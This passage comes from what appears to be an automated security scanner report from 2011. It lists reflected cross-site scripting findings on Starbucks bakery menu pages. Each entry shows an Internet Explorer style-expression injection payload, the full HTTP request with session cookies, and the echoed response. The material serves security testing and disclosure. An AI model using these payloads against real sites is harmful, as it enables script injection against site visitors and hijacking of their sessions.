Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:12 GMT
Connection: close
Content-Length: 44140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone?f9357"style="x:expression(alert(1))"a5e7a229ce8=1"/>
...[SNIP]...

2.222. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-orange-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72286"style%3d"x%3aexpression(alert(1))"197c462648b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72286"style="x:expression(alert(1))"197c462648b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cranberry-orange-scone?72286"style%3d"x%3aexpression(alert(1))"197c462648b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:41 GMT
Connection: close
Content-Length: 44023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone?72286"style="x:expression(alert(1))"197c462648b=1"/>
...[SNIP]...

2.223. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-chocolate-brownie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f0b7"style="x:expression(alert(1))"aedb089978d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-chocolate-brownie?6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:06 GMT
Connection: close
Content-Length: 43802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie?6f0b7"style="x:expression(alert(1))"aedb089978d=1"/>
...[SNIP]...

2.224. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-fudge-mini-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1f7a"style="x:expression(alert(1))"12f20aa2559 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:17 GMT
Connection: close
Content-Length: 43677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style="x:expression(alert(1))"12f20aa2559=1"/>
...[SNIP]...

2.225. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-iced-cinnamon-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c5ac"style="x:expression(alert(1))"518bf21ccf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:22 GMT
Connection: close
Content-Length: 44648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style="x:expression(alert(1))"518bf21ccf8=1"/>
...[SNIP]...

2.226. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/ginger-molasses-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed67b"style="x:expression(alert(1))"139025d5ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/ginger-molasses-cookie?ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:43 GMT
Connection: close
Content-Length: 43092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie?ed67b"style="x:expression(alert(1))"139025d5ad=1"/>
...[SNIP]...

2.227. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/hawaiian-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c503f"style%3d"x%3aexpression(alert(1))"cd602ede713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c503f"style="x:expression(alert(1))"cd602ede713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/hawaiian-bagel?c503f"style%3d"x%3aexpression(alert(1))"cd602ede713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:13 GMT
Connection: close
Content-Length: 43576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/hawaiian-bagel?c503f"style="x:expression(alert(1))"cd602ede713=1"/>
...[SNIP]...

2.228. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/iced-lemon-pound-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddfa4"style="x:expression(alert(1))"a47f474673c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/iced-lemon-pound-cake?ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:47 GMT
Connection: close
Content-Length: 44496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake?ddfa4"style="x:expression(alert(1))"a47f474673c=1"/>
...[SNIP]...

2.229. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/low-fat-raspberry-sunshine-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef2aa"style="x:expression(alert(1))"36428682d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:01 GMT
Connection: close
Content-Length: 43853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style="x:expression(alert(1))"36428682d89=1"/>
...[SNIP]...

2.230. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/mallorca-sweet-bread

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea7f1"style="x:expression(alert(1))"a7c7d383e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/mallorca-sweet-bread?ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:40 GMT
Connection: close
Content-Length: 44079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread?ea7f1"style="x:expression(alert(1))"a7c7d383e8a=1"/>
...[SNIP]...

2.231. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/maple-oat-pecan-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d84b"style="x:expression(alert(1))"54ee8af6ce1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/maple-oat-pecan-scone?4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:11 GMT
Connection: close
Content-Length: 43961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone?4d84b"style="x:expression(alert(1))"54ee8af6ce1=1"/>
...[SNIP]...

2.232. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marble-pound-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd3db"style="x:expression(alert(1))"604a55d7060 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/marble-pound-cake?bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:34 GMT
Connection: close
Content-Length: 43704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marble-pound-cake?bd3db"style="x:expression(alert(1))"604a55d7060=1"/>
...[SNIP]...

2.233. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marshmallow-dream-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d416"style="x:expression(alert(1))"80939aba3c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/marshmallow-dream-bar?2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:47 GMT
Connection: close
Content-Length: 43514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar?2d416"style="x:expression(alert(1))"80939aba3c2=1"/>
...[SNIP]...

2.234. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/morning-bun

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e918"style="x:expression(alert(1))"7d0bd106018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/morning-bun?4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:56 GMT
Connection: close
Content-Length: 43247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/morning-bun?4e918"style="x:expression(alert(1))"7d0bd106018=1"/>
...[SNIP]...

2.235. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/multigrain-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34ba5"style="x:expression(alert(1))"9c913b552b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/multigrain-bagel?34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
